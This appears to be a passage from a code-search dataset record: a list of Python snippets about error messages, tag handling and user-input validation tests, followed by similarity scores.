error(self, tag, message, exc_info=False):\n \n self.log(logging.error,tag, message, exc_info)", "def __init__(self, message):\n logging.error(\"ERROR: {0}\".format(message))\n logging.error(\"Try running with --help for more information.\")", "def _validate_template(self, template):\r\n index = template.find(COURSE_EMAIL_MESSAGE_BODY_TAG)\r\n if index < 0:\r\n msg = 'Missing tag: \"{}\"'.format(COURSE_EMAIL_MESSAGE_BODY_TAG)\r\n log.warning(msg)\r\n raise ValidationError(msg)\r\n if template.find(COURSE_EMAIL_MESSAGE_BODY_TAG, index + 1) >= 0:\r\n msg = 'Multiple instances of tag: 
\"{}\"'.format(COURSE_EMAIL_MESSAGE_BODY_TAG)\r\n log.warning(msg)\r\n raise ValidationError(msg)\r\n # TODO: add more validation here, including the set of known tags\r\n # for which values will be supplied. (Email will fail if the template\r\n # uses tags for which values are not supplied.)\r", "def test_create_tag_invalid(self):\n payload = {'name': ''}\n res = self.client.post(TAGS_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)", "def __init__(self, username: str) -> None:\n try:\n check_string(username, 'username', 'a-z0-9', 100)\n except IllegalParameterError as e:\n raise IllegalUsernameError(e.message) from e\n self.name = username", "def check_user(msg):\n if \"Error\" in msg:\n raise ValueError('User already exists.')", "def setUserError(self, errStr):\n if self.ioLoopInst is not None:\n cmd = {'cmd': 'userError', 'error': errStr}\n self._sendMessageToWeb(cmd)\n else:\n print(\"UseError: \" + errStr)", "def test_register_user_with_empty_data(self, app):\n data = RegisterUser.random()\n setattr(data, \"username\", None)\n res = app.register.register(\n data=data, type_response=RegisterUserResponseInvalid\n )\n assert res.status_code == 400\n assert res.data.message == ResponseText.MESSAGE_REGISTER_USER_INVALID", "def set_tag(tag, message):\n if not verify_tag(tag):\n subprocess.run(\n [\"git\", \"tag\", \"--annotate\", tag, f'--message=\"{message}\"'],\n check=True,\n )", "def test_user_cannot_register_with_invalid_username(self):\n response = self.client.post(SIGNUP_URL,\n data=json.dumps(\n {'username': '#_danny', 'email': 'danny@gmail.com', 'password': 'pass12345'}),\n content_type='application/json')\n self.assertEqual(response.status_code, 400)\n result = json.loads(response.data.decode())\n self.assertEqual(result[\"message\"], \"Invalid username\")", "def test_create_tag_invalid(self):\n payload = {'name': ''}\n res = self.client.post(TAGS_URL, payload)\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)", "def for_tag(self, tag):\n if not isinstance(tag, str):\n raise TypeError('Tag must be a string')\n\n self.token['requiredTag'] = tag\n\n return self", "def __init__(self, *args, **kwargs):\n\n # Construct the base instance.\n super(FilterUser, self).__init__(*args, **kwargs)\n\n # Construct a regular expression tag evaluator.\n regextag = self.thistag.find('UserRegex')\n if regextag == None:\n raise ValueError('Required tag missing: UserRegex')\n self.regex = RegexTag(regextag, re.IGNORECASE)\n\n # Get the user name.\n self.user = self.context.tokens['User']\n logger.debug('user = \"{0}\"'.format(self.user))", "def _load_from_text(self, text):\n self.code = \"Error\"\n self.message = text", "def _error(self, token, msg):\n self._interpreter.parse_error(token, msg)\n return ParseError()", "def signin_failure(request, message):\n request.user.message_set.create(message = message)\n return show_signin_view(request)", "def __init__(self, error_search=\"error\"):\n self.error_search = error_search", "def __init__(self, source, bad):\n super(RequestFormatException, self).__init__()\n self.source = source\n self.bad = bad", "def error(self, message):\n raise ArgumentParseError(message)", "def error_message(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"error_message\")", "def get_username_validation_error(username):\n return _validate(_validate_username, errors.AccountUsernameInvalid, username)", "def __init__(__self__, *,\n message: Optional[pulumi.Input[str]] = None,\n type: 
Optional[pulumi.Input['DataSourceErrorInfoType']] = None):\n if message is not None:\n pulumi.set(__self__, \"message\", message)\n if type is not None:\n pulumi.set(__self__, \"type\", type)", "def error(self, auth_token, message):\n\n self._log(auth_token, logging.ERROR, message)", "def sign_up_failure(self, urlrequest, failure_data):\n # self.hide_loading_screen()\n # self.email_exists = False # Triggers hiding the sign in button\n print(failure_data)\n # msg = failure_data['error']['message'].replace(\"_\", \" \").capitalize()\n # # Check if the error msg is the same as the last one\n # if msg == self.sign_up_msg:\n # # Need to modify it somehow to make the error popup display\n # msg = \" \" + msg + \" \"\n # self.sign_up_msg = msg\n # if msg == \"Email exists\":\n # self.email_exists = True\n # if self.debug:\n # print(\"Couldn't sign the user up: \", failure_data)", "def __init__(self,value,message):\n ValueError.__init__(self,value,message)", "def setErrorMessage(self, errorMessage):\n self._errorMessage = errorMessage", "def error(self, key, value, context, errorclass=InvalidDataError, **values):\n msg_template = self.message_for_key(key, context)\n raise errorclass(msg_template % values, value, key=key, context=context)", "def testBinaryValueWithMissingField(self):\n objectID = uuid4()\n user = createUser(u'username', u'password', u'User', u'user@foo.org')\n namespace = createNamespace(user, u'name')\n tag = createTag(user, namespace, u'tag')\n self.assertRaises(ValueError, TagValue, user.id, tag.id, objectID,\n {'size': 123})\n self.assertRaises(ValueError, TagValue, user.id, tag.id, objectID,\n {'mime-type': 'text/html'})", "def failed(self, message=None):\n doc = {self.STATE: self.STATE_FAILED}\n\n if message:\n doc.update({self.ERROR_MESSAGE: message})\n\n self.update(doc)", "def test_register_user_with_int_username(self, app):\n data = RegisterUserInt.random()\n res = app.register.register(\n data=data, type_response=RegisterUserResponseInvalid\n )\n assert res.status_code == 400\n assert res.data_info.message == ResponseText.MESSAGE_REGISTER_USER_INVALID", "def test_create_tag_invalid_payload(self):\n\n tag_payload = {'name': ''}\n response = self.client.post(URL_TAGS, tag_payload)\n\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)", "def error_message(self, error_message):\n # type: (string_types) -> None\n\n if error_message is not None:\n if not isinstance(error_message, string_types):\n raise TypeError(\"Invalid type for `error_message`, type has to be `string_types`\")\n\n self._error_message = error_message", "def __init__(self, msg):\n\n super(ConfigError, self).__init__(msg)\n self.msg = msg", "def __init__(\n self, user_message: str, yaml_path: str, segment: Optional[str] = None\n ) -> None:\n super().__init__(\n user_message=user_message, yaml_path=yaml_path, segment=segment)", "def set_error_message(msg):\n set_message(msg, TYPE_ERROR)", "def __init__(self, msg=\"\"\"Google can\\'t find enough news data for this query: Invalid query\"\"\"):\n super().__init__(msg)", "def __init__(self, msg: str, definition: Optional[ErrorDef] = None) -> None:\n if definition is None:\n definition = CommonErrorDef.INTERNAL_SERVER_ERROR\n\n super().__init__(definition=definition, error=msg)", "def test_construct_frame_tag_error(attributes, exception, error_msg):\n with pytest.raises(exception) as exc:\n Frame(**attributes)\n\n assert error_msg in str(exc)", "def __init__(self, error_msg):\n super(ConnectionException, self).__init__(error_msg)", "def error(self, 
**data):\n template_specification = dict(mainContent=\"../error\", title=\"Error page\", data=data)\n template_specification = self._fill_user_specific_attributes(template_specification)\n return self.fill_default_attributes(template_specification)", "def __init__(__self__, *,\n ip_tag_type: Optional[pulumi.Input[str]] = None,\n tag: Optional[pulumi.Input[str]] = None):\n if ip_tag_type is not None:\n pulumi.set(__self__, \"ip_tag_type\", ip_tag_type)\n if tag is not None:\n pulumi.set(__self__, \"tag\", tag)", "def __init__(self, schemas):\n # Prepend \"string\" to handle system errors\n schemas = [PrimitiveSchema(data_type=STRING)] + list(schemas)\n super(ErrorUnionSchema, self).__init__(schemas=schemas)", "def __init__(self, msg):\n\n super(HTTPError, self).__init__(msg)\n self.msg = msg", "def username_error(self, msg):\n print('\\nusername error: %s' % msg, file=self.console)\n self.username = input('Username: ')", "def __init__(__self__, *,\n error_code: int,\n error_message: str,\n exception_message: str,\n recommended_action: str):\n pulumi.set(__self__, \"error_code\", error_code)\n pulumi.set(__self__, \"error_message\", error_message)\n pulumi.set(__self__, \"exception_message\", exception_message)\n pulumi.set(__self__, \"recommended_action\", recommended_action)", "def __init__(self, message):\n config.log.critical(\"Not Supported: %s\" % (message))", "def __init__(self, message):\n config.log.critical(\"Not Supported: %s\" % (message))", "def test_add_tag_invalid(self):\n payload = {'name': ''}\n res = self.client.post(TAGS_URL, payload)\n\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)", "def __init__(self, tag):\n self._tag = tag\n SequentialBackoffTagger.__init__(self, None)", "def missingvalue(message):\n raise jinja2.UndefinedError(message)", "def __init__(self, message, code, *args):\n self.message = message\n self.code = code\n super(TwitterException, self).__init__(message, code, *args)", "def _error(self, message):\r\n dlg = wx.MessageDialog(self, message,\r\n 'xmi2magik',\r\n wx.OK | wx.ICON_ERROR\r\n )\r\n dlg.ShowModal()\r\n dlg.Destroy()", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Data requested from a class could not be found: {}\".format(message)\n )", "def __init__(self, error_num, args, msg):\n\n self.error_num = error_num\n self.args = args\n self.message = msg", "def __init__(self, user_data=bytearray(bytes(14))):\n self._user_data = _normalize(create_empty(0x00), user_data)", "def test_bad_register(self):\n body, code = self.post(f\"/users\", bob, bob_creds)\n self.assertEqual(400, code)\n self.assertEqual({\"error\": \"Invalid request.\"}, body)", "def test_invalid_as_name(self):\n\n def make_bad_tag():\n class BadTag(ttag.helpers.AsTag):\n as_ = ttag.Arg(named=True)\n\n self.assertRaises(template.TemplateSyntaxError, make_bad_tag)", "def error(self, messages=None):\n return StateError(\n created_at=self.created_at,\n started_at=self.started_at,\n messages=messages\n )", "def __init__(self, status_code, sdk_error):\n super(ServiceResponseException, self).__init__(sdk_error.error_msg)\n self.status_code = status_code\n self.error_code = sdk_error.error_code\n self.request_id = sdk_error.request_id", "def error(self, msg, *args, **kwargs):\n pass", "def test_registeration_invalid_email(self):\n response = self.signup_a_user(self.user_invalid_email)\n self.assertEqual(response.status_code, status.HTTP_400_BAD_REQUEST)\n self.assertEqual(response.data[\"errors\"][\"email\"],\n [\"Enter a valid email address.\"]\n 
)\n self.assertNotIn(\"token\", response.data)", "def test_bad_request_anon_user_invalid_email(self, zendesk_mock_class, datadog_mock):\r\n fields = self._anon_fields.copy()\r\n fields[\"email\"] = \"This is not a valid email address!\"\r\n resp = self._build_and_run_request(self._anon_user, fields)\r\n self._assert_bad_request(resp, \"email\", zendesk_mock_class, datadog_mock)", "def set_error(self, name, value):\n self.errors[name] = value", "def error_message(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"error_message\")", "def error_message(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"error_message\")" ]
[ "0.56462985", "0.54964924", "0.536261", "0.5255886", "0.52409583", "0.5214799", "0.51638514", "0.51309276", "0.512227", "0.5116152", "0.50880295", "0.5065294", "0.50539815", "0.5043654", "0.50230527", "0.5009636", "0.49937543", "0.499186", "0.49844167", "0.49798706", "0.49764267", "0.4972648", "0.49568847", "0.4954867", "0.494364", "0.49326766", "0.4930944", "0.49288702", "0.48990867", "0.48990867", "0.48990867", "0.48912236", "0.4884452", "0.48831207", "0.4854587", "0.4848369", "0.48367506", "0.47945312", "0.47823814", "0.47744393", "0.47632828", "0.4747407", "0.47446847", "0.47407833", "0.47159714", "0.47134435", "0.47107378", "0.46995386", "0.4696905", "0.46872208", "0.4654463", "0.4650296", "0.46359056", "0.46349666", "0.4631727", "0.46123043", "0.4605602", "0.4600006", "0.45986286", "0.4597451", "0.45954528", "0.45911494", "0.4590956", "0.45903966", "0.45822108", "0.4581515", "0.45799917", "0.45795068", "0.4571716", "0.45687822", "0.4567664", "0.4563971", "0.45588973", "0.45532432", "0.4548248", "0.4537771", "0.45357794", "0.4532106", "0.451978", "0.45176393", "0.45104873", "0.4504935", "0.4504935", "0.4504767", "0.4504725", "0.4504688", "0.45031774", "0.4501836", "0.4500811", "0.4498059", "0.44971523", "0.4495802", "0.44936353", "0.44912964", "0.44883385", "0.44842538", "0.44744223", "0.44661713", "0.44552502", "0.44548056", "0.44548056" ]
0.0
-1
Initializes InvalidProfilePicturePath with an error message.
def __init__(self, msg): self.msg = msg
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def test_user_profile_picture_invalid_image_fails(self):\n image_upload_url = PROCEDURE_URL\n\n payload = {\n 'name': 'temp',\n 'speciality': [self.speciality.pk],\n 'image': 'invalid image',\n 'overview': 'bla bla bla'\n }\n\n res = self.client.post(\n image_upload_url,\n payload,\n format=\"multipart\"\n )\n\n self.assertEqual(res.status_code, status.HTTP_400_BAD_REQUEST)", "def test_upload_profile_pic(self):\n url = 'https://cdn.business2community.com/wp-content/uploads/2017/08/blank-profile-picture-973460_640.png'\n\n details = self.new_user.upload_profile_pic(url)\n\n self.assertEqual(self.new_user.profile_pic, details.get('url'))\n destroy(details.get('public_id'))\n\n # Test if invalid image path is inserted\n with self.assertRaises(Exception):\n details = self.new_user.upload_profile_pic('Random path')\n self.assertEqual(self.new_user.profile_pic, details.get('url'))", "def __init__(self, error_code: int, message: str):\r\n self.error_code: int = error_code\r\n self.message: str = message\r\n super(ImageUnaccesible, self).__init__(self.error_code,\r\n f'{self.error_code} ---> \\\r\n {self.message}')", "def __init__(self, message='', path=(), notes=()):\n self.message = message\n self.plain_message = message # for backwards compat\n self.path = list(path)\n self.notes = notes\n super(PlotlyGraphObjectError, self).__init__(message)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def __init__(self, error = ''):\n IPRO_Error.__init__(self, error)", "def initErrMsgImage(self):\n draw = ImageDraw.Draw(self.errMsgImage)\n # Outline\n draw.rectangle((0,0,self.width-1,self.height-1),outline=255,fill=0)\n # Stripes\n nLines = 8\n lineSlope = self.height/2\n for i in range(0,nLines):\n x0 = i*self.width/(2*nLines)\n y0 = 0\n x1 = x0 - lineSlope\n y1 = self.height\n draw.line((x0,y0,x1,y1),fill=255)\n # Text box\n x0 = self.width/4\n y0 = 0\n x1 = self.width-1\n y1 = self.height-1\n draw.rectangle((x0,y0,x1,y1),outline=255,fill=0)\n # Error symbols\n x0 = self.width/16\n y0 = 3*self.height/4\n x1 = 3*self.width/16\n y1 = y0\n x2 = (x0 + x1)/2\n y2 = self.height/4\n draw.polygon((x0,y0,x1,y1,x2,y2),outline=255,fill=255)\n draw.text((x0+6,y2+5),'!',font=self.font,fill=0)\n return", "def error_no_profile():\r\n tkMessageBox.showerror(\"Błąd, Nie wybrano profilu.\",\r\n \"Należy dokonać wyboru profilu do filtrowania danych, \"\r\n \"szczegóły poszczególnych profili można znaleść w Menadżeże Profili\")", "def __init__(self, path: pathlib.Path, msg: str) -> None:\n super().__init__(f\"Could not parse the components file {path}: {msg}\")\n self.osi_path = path\n self.osi_msg = msg", "def __init__(self, error_msg):\n super(SdkException, self).__init__()\n self.error_msg = error_msg", "def __init__(self, real_path, first_path, second_path):\n\t\tsuper(RecursionError, self).__init__(real_path, first_path, second_path)", "def __init__(self, message=None):\n if message is not None:\n super(CryptoritoError, self).__init__(message)\n else:\n super(CryptoritoError, self).__init__()", "def profile_pic(self):\n raise AttributeError('profile_pic is not a readable attribute')", "def test_requestMalformedAvatarId(self):\n d = self._requestAvatarId(\n UsernamePassword(self.localpart, self.password))\n return self.assertFailure(d, errors.MissingDomainPart)", "def get_server_profile_error_message(profile_name):\n FusionUIBase.navigate_to_section(SectionType.SERVER_PROFILES, time_for_loading=5)\n if not 
VerifyServerProfile.verify_server_profile_exist(profile_name, fail_if_false=False):\n ui_lib.fail_test(\"Proflie %s is not present, hence exiting\" % profile_name)\n else:\n CommonOperationServerProfile.click_server_profile(profile_name=profile_name, time_for_loading=4)\n return CommonOperationServerProfile.get_profile_error_message(timeout=20, fail_if_false=False)", "def load_error(self, error=None):\n if error is not None or str(error).strip() != \"\":\n dial = wx.MessageDialog(self.parent, str(error),\n 'Error Loading File',\n wx.OK | wx.ICON_EXCLAMATION)\n dial.ShowModal()", "def error(request):\r\n #Retrieve information which caused an error\r\n messages = get_messages(request)\r\n info =''\r\n try:\r\n user = _validate_and_get_geniuser(request)\r\n return profile(request, info, info, messages)\r\n except:\r\n return _show_login(request, 'accounts/login.html', {'messages' : messages})", "def errpath(self):\n return None", "def __init__(self, msg):\n\n super(ConfigError, self).__init__(msg)\n self.msg = msg", "def initialize():\n pinfo = pathinfo()\n\n if not pinfo:\n raise Error('cannot decide profile directory, $SUZUPROFILEDIR, $APPDATA, or $HOME should be configured.')\n\n # dig profdir\n if not os.path.isdir(pinfo['profiledir']):\n os.mkdir(pinfo['profiledir'])\n\n # test dir\n if not os.path.isdir(pinfo['profiledir']):\n raise Error('profile directory {} does not exist, nor cannot create'.format(pinfo['profiledir']))\n\n # test profile data file\n if not os.path.isfile(pinfo['config']):\n with open(pinfo['config'], 'w') as stream:\n json.dump(config.default, stream, indent=2, sort_keys=True)\n\n # test file (do not care on the contents)\n if not os.path.isfile(pinfo['config']):\n raise Error('config file {} does not exist, nor cannot create'.format(pinfo['config']))\n\n return pinfo", "def __init__(self, data_file_name: str, message: str) -> None:\n\n super().__init__(\n \"Invalid data error. 
\"\n \"The file '{}' contained data of the wrong format: {}\".format(\n data_file_name, message\n )\n )", "def error_message(self, error_message: str):\n\n self._error_message = error_message", "def input_error_checking(profile, tarchive_path, upload_id, usage):\n\n if not profile:\n message = '\\n\\tERROR: you must specify a profile file using -p or ' \\\n '--profile option'\n print(message)\n print(usage)\n sys.exit(lib.exitcode.MISSING_ARG)\n\n if not tarchive_path:\n message = '\\n\\tERROR: you must specify a DICOM archive path using -t or ' \\\n '--tarchive option'\n print(message)\n print(usage)\n sys.exit(lib.exitcode.MISSING_ARG)\n\n if not upload_id:\n message = '\\n\\tERROR: you must specify an UploadID using -u or ' \\\n '--uploadid option'\n print(message)\n print(usage)\n sys.exit(lib.exitcode.MISSING_ARG)\n\n if os.path.isfile(profile):\n sys.path.append(os.path.dirname(profile))\n config_file = __import__(os.path.basename(profile[:-3]))\n else:\n message = '\\n\\tERROR: you must specify a valid profile file.\\n' + \\\n profile + ' does not exist!'\n print(message)\n print(usage)\n sys.exit(lib.exitcode.INVALID_PATH)\n\n if not os.path.isfile(tarchive_path):\n message = '\\n\\tERROR: you must specify a valid DICOM archive path.\\n' + \\\n tarchive_path + ' does not exist!'\n print(message)\n print(usage)\n sys.exit(lib.exitcode.INVALID_PATH)\n\n try:\n int(upload_id)\n except ValueError:\n message = '\\n\\tERROR: you must specify an integer value for --uploadid option.\\n'\n print(message)\n print(usage)\n\n return config_file", "def __init__(self, msg, path_to_item=None):\n self.path_to_item = path_to_item\n full_msg = msg\n if path_to_item:\n full_msg = \"{0} at {1}\".format(msg, render_path(path_to_item))\n super(ApiAttributeError, self).__init__(full_msg)", "def add_error(self, request, message):\n\n ParameterErrorMessage(request, self, message)", "def __init__(self, message=None):\n if message is None:\n message = \"Game error!\"\n self.__message = message", "def profile_photo(self):\n images_directory_index = 6\n filepath = None\n photo = self.profile_photo_path\n if photo is not None:\n photo_dir = photo.split(\"/\")[images_directory_index:]\n filepath = \"/\".join(photo_dir)\n return filepath", "def error_message(self, error_message):\n\n self._error_message = error_message", "def __init__(__self__, *,\n error_code: pulumi.Input[Union[str, 'CopyCompletionErrorReason']],\n error_message: pulumi.Input[str]):\n pulumi.set(__self__, \"error_code\", error_code)\n pulumi.set(__self__, \"error_message\", error_message)", "def profile_image_src(self, size):\n if self.profile_image:\n return join_path(STATIC_IMAGE_URL, 'users', \"{}.{}.{}.png\".format(self.id, self.profile_image, size)).replace(\"\\\\\", '/')\n return join_path(STATIC_IMAGE_URL, \"users\", \"no_profile.jpg\").replace(\"\\\\\", '/')", "def __init__(self, security_identifier, profile_path):\n super(UserProfile, self).__init__()\n self.profile_path = profile_path\n self.security_identifier = security_identifier", "def __init__(self, obj):\n super().__init__(\"File {} doesn't exist or invalid.\".format(obj))", "def save_fail_img(self):\n self.save_img(\"Email\")", "def __init__(self, message, code=None, params=None):\n super().__init__(message, code, params)\n\n if isinstance(message, ValidationError):\n if hasattr(message, 'error_dict'):\n message = message.error_dict\n elif not hasattr(message, 'message'):\n message = message.error_list\n else:\n message, code, params = message.message, message.code, 
message.params\n\n if isinstance(message, dict):\n self.error_dict = {}\n for field, messages in message.items():\n if not isinstance(messages, ValidationError):\n messages = ValidationError(messages)\n self.error_dict[field] = messages.error_list\n\n elif isinstance(message, list):\n self.error_list = []\n for message in message:\n # Normalize plain strings to instances of ValidationError.\n if not isinstance(message, ValidationError):\n message = ValidationError(message)\n if hasattr(message, 'error_dict'):\n self.error_list.extend(sum(message.error_dict.values(), []))\n else:\n self.error_list.extend(message.error_list)\n\n else:\n self.message = message\n self.code = code\n self.params = params\n self.error_list = [self]", "def user_profile_avatar_path(user_info, filename):\n return 'user_{0}/avatars/{1}'.format(instance.user.id, filename)", "def error(self, message):\n raise io_mp.ConfigurationError(message)", "def get_picture(self):\n\t\tno_picture = settings.STATIC_URL + 'img/img_avatar.png'\n\t\ttry:\n\t\t\treturn self.picture.url\n\t\texcept:\n\t\t\treturn no_picture", "def __init__(self, message=\"\"):\n super(DataError, self).__init__(message)", "def __init__(self, message: str) -> None:\n\n super().__init__(\n \"Due to the nature of the load data, an integer multiple of resolutions, \"\n \"or divsions of resolutions, must be supplied with the '--resolution' or \"\n \"'-r' flag.\\nI appreciate that this is poor coding, but at least I took \"\n \"the time to write a custom exception for it :p .\\n Error message: \"\n f\"{message}\"\n )", "def __init__(self, message_id: str, error_code: str):\n super().__init__(f\"Command failed: {error_code}\")\n self.message_id = message_id\n self.error_code = error_code", "def test_resumeWhenFileDoesNotExist(self):\n fp = FilePath(self.mktemp())\n\n error = self.assertRaises(\n OSError, self.makeConnectedDccFileReceive, fp.path, resumeOffset=1\n )\n\n self.assertEqual(errno.ENOENT, error.errno)", "def __init__(self, message=\"\"):\n super(ValidationError, self).__init__(message)", "def __init__(self, msg):\n super(F5CcclSchemaError, self).__init__(msg)\n self.msg = 'Schema provided is invalid: ' + msg", "def __init__(self, from_email):\n self.code = 400\n self.from_email = from_email\n Error.__init__(self)", "def __init__(self, message=\"\"):\n super(ApplicationError, self).__init__(message)", "def test_photo_init_error_no_camera_name(full_photo_params):\n del full_photo_params['camera']['name']\n with pytest.raises(KeyError):\n Photo(**full_photo_params)", "def __init__(self, error_message: str=None, error_code: int=None): # noqa: E501\n self.swagger_types = {\n 'error_message': str,\n 'error_code': int\n }\n\n self.attribute_map = {\n 'error_message': 'error_message',\n 'error_code': 'error_code'\n }\n\n self._error_message = error_message\n self._error_code = error_code", "def on_init_fail(self, event_time, message):\n pass", "def testUidMissingError(self):\n self.assertRaises(ValueError, dicom_path.Path, 'p', 'l', 'd', 's', None,\n '4.5.6')\n self.assertRaises(ValueError, dicom_path.Path, 'p', 'l', 'd', 's', 'stuid',\n None, '7.8.9')", "def error(self, message, token=None):\n raise ParseException(\n message,\n self.filename,\n line=self._line,\n line_number=self._line_number,\n token=token)", "def __init__(self, message):\n self.message = LicenseError.ERROR + message\n\n super(LicenseError, self).__init__(self.message)", "def test_constructor_with_wrong_folder_name_should_raise_exception(self):\n with self.assertRaises(UploaderException) as 
cm:\n GDriveUploader(None, 'my_wrong_folder_name!')\n\n self.assertEqual(\n UploaderException.INVALID_DIR_NAME,\n cm.exception.code\n )", "def error(self, message):\r\n self._construct_partial_parser().error(message)", "def test_user_profile_form_invalid(self):\n form = UserProfileForm(data={\n 'default_phone_number': 'test_phone_number',\n 'default_town_or_city': 'test_town_or_city',\n 'default_street_address1': 'test_street1',\n 'default_street_address2': 'test_street2',\n 'default_county': 'test_county',\n 'default_country': 'test_country',\n })\n self.assertFalse(form.is_valid())\n self.assertEquals(len(form.errors), 1)", "def test_photo_init_error_no_camera(full_photo_params):\n del full_photo_params['camera']\n with pytest.raises(KeyError):\n Photo(**full_photo_params)", "def __init__(self, msg: str, definition: Optional[ErrorDef] = None) -> None:\n if definition is None:\n definition = CommonErrorDef.INTERNAL_SERVER_ERROR\n\n super().__init__(definition=definition, error=msg)", "def profile_image_url(self, profile_image_url):\n\n self._profile_image_url = profile_image_url", "def __init__(self, profile: str = \"default\", fallback_to_default = True):\n\t\tif fallback_to_default:\n\t\t\tif not get_config(f\"libupload.{profile}\"):\n\t\t\t\tprofile = \"default\"\n\n\t\tif not get_config(f\"libupload.{profile}\"):\n\t\t\traise AssertionError(f\"Profile {profile} not found\")\n\n\t\tself.method = get_config(f\"libupload.{profile}.method\")\n\t\tself.destination_path_base = Path(get_config(f\"libupload.{profile}.base_dir\"))\n\t\tself.host = get_config(f\"libupload.{profile}.host\")\n\t\tself.port = get_config(f\"libupload.{profile}.port\")\n\t\tself.server = self.host if self.port is None else f\"{self.host}:{self.port}\"\n\t\tself.username = get_config(f\"libupload.{profile}.username\")\n\t\tself.password = get_config(f\"libupload.{profile}.password\")", "def set_error_message(msg):\n set_message(msg, TYPE_ERROR)", "def test_invalid_image(self):\n with open('apps/upload/__init__.py', 'rb') as f:\n r = post(self.client, 'upload.up_image_async', {'image': f},\n args=['questions.Question', 1])\n\n eq_(400, r.status_code)\n json_r = json.loads(r.content)\n eq_('error', json_r['status'])\n eq_('Invalid or no image received.', json_r['message'])\n eq_('The submitted file is empty.', json_r['errors']['image'][0])", "def _syntax_error(msg):\n try:\n filename = stream.name\n except AttributeError:\n filename = None\n return RFC822SyntaxError(filename, lineno, msg)", "def _error(msg):\n\n error(None, msg)", "def test_requestNonexistentAvatarId(self):\n username = '%s@%s' % (self.localpart, self.domain)\n d = self._requestAvatarId(\n UsernamePassword(username, self.password))\n return self.assertFailure(d, errors.NoSuchUser)", "def photo_path(instance, filename):\n return 'users/{0}/{1}'.format(instance.user.username, '.'.join(['profile-photo', filename.split('.')[-1]]))", "def __init__(\n self, user_message: str, yaml_path: str, segment: Optional[str] = None\n ) -> None:\n super().__init__(\n user_message=user_message, yaml_path=yaml_path, segment=segment)", "def get_error_file(self):\n pass", "def error(self, message):\n self._clear()\n print(\"ERROR:\", message)\n self._draw()", "def regexp_error_msg(self, regexp_error_msg):\n\n self._regexp_error_msg = regexp_error_msg", "def __init__(self, message=\"\"):\n super(AutomationError, self).__init__(message)", "def initErrorCheck(self):\n #setup pvs to check\n self.error_bcs = \"BCS:MCC0:1:BEAMPMSV\"\n self.error_mps = 
\"SIOC:SYS0:ML00:CALCOUT989\"\n self.error_gaurdian = \"SIOC:SYS0:ML00:AO466\"\n self.error_und_tmit = \"BPMS:UND1:3290:TMITTH\"\n\n #pv to bypass the error pause\n self.error_bypass = \"SIOC:SYS0:ML00:CALCOUT990\"\n self.error_tripped = \"SIOC:SYS0:ML00:CALCOUT991\"\n\n #set the unlatch pv to zero\n epics.caput(self.error_bypass, 0)\n epics.caput(self.error_tripped,0)", "def pcp_internal_error(self, msg):\n\t\tif self.errMsg:\n\t\t\tdel self.errMsg\n\n\t\tself.errMsg = msg", "def test_iter_errors_invalid_resume(self):\n errors = list(resumeschema.iter_errors(self.invalid_resume))\n self.assertEqual(len(errors), 3)\n\n self.assertEqual(list(errors[0].path), ['basics'])\n self.assertEqual(\n errors[0].message, 'Additional properties are not allowed (u\\'first_name\\', u\\'last_name\\' were unexpected)'\n )\n\n self.assertEqual(list(errors[1].path), ['basics', 'profiles'])\n self.assertEqual(\n errors[1].message,\n '{u\\'username\\': u\\'neutralthoughts\\', u\\'network\\': u\\'Facebook\\'} is not of type u\\'array\\''\n )\n\n self.assertEqual(list(errors[2].path), ['work'])\n self.assertEqual(\n errors[2].message,\n ('{u\\'website\\': u\\'http://piedpiper.com\\', u\\'startDate\\': u\\'2013-12-01\\', u\\'highlights\\': '\n '[u\\'Build an algorithm\\'], u\\'company\\': u\\'Pied Piper\\', u\\'summary\\': '\n 'u\\'Pied Piper is a multi-platform technology.\\', u\\'position\\': u\\'CEO/President\\'} '\n 'is not of type u\\'array\\'')\n )", "def test_info_fail(self):\n path = \"non_existing_audio.wav\"\n with self.assertRaisesRegex(RuntimeError, path):\n self._info(path)", "def ProduceExtractionError(self, message, path_spec=None):\n # type: (str, PathSpec) -> None\n print(\"ERROR \" + message)\n print(pprint(vars(path_spec)))", "def set_user_profile_picture(user_id, file_name):\n\n user = User.query.get(user_id)\n \n user.profile_picture = file_name\n db.session.commit()", "def _add_profile_image(self):\r\n self.profile_image_is_set = True\r\n file_name = filedialog.askopenfilename(initialdir=\"/\", title=self.language.refactor(\"Select GIF file\"),\r\n filetypes=((\"GIF files\", \"*.gif\"),))\r\n if file_name == '':\r\n self.new_user_window.lift()\r\n return\r\n\r\n self.add_profile_gif_button.destroy()\r\n gif_canvas = Ctk.CCanvas(self.new_user_window, corners='angular', size=(180, 180),\r\n bg=self.new_user_window['background'])\r\n gif_canvas.create_gif(gif_path=file_name, corner='round', size=(175, 175), pos=(90, 90),\r\n transparent=True, speed='normal')\r\n gif_canvas.place(*(15, 50))\r\n\r\n self.gif_file_path = file_name\r\n\r\n self.new_user_window.lift()", "def delete_profile_pic(sender, instance, **kwargs):\n if instance.profile_picture:\n if instance.profile_picture.name != \"default.png\":\n path = instance.profile_picture.path\n os.remove(path)", "def get_profile_picture_url(cls, filename):\n if filename is None:\n return None\n profile_picture = bucket.blob('images/users/'+filename)\n if profile_picture.exists():\n profile_picture.make_public()\n return profile_picture.public_url\n return None", "def parse_error(self, message, exc_cls=VisualizerParseError):\n raise exc_cls(\"Error parsing %s '%s' (%s:%i): %s\" % \n (self.tag, self.ref, self.filename, self.lineno, message))", "def add_error(self, path, error):\n self.errors = merge_errors(self.errors, self._make_error(path, error))", "def error_message(self, error_message):\n # type: (string_types) -> None\n\n if error_message is not None:\n if not isinstance(error_message, string_types):\n raise TypeError(\"Invalid type for 
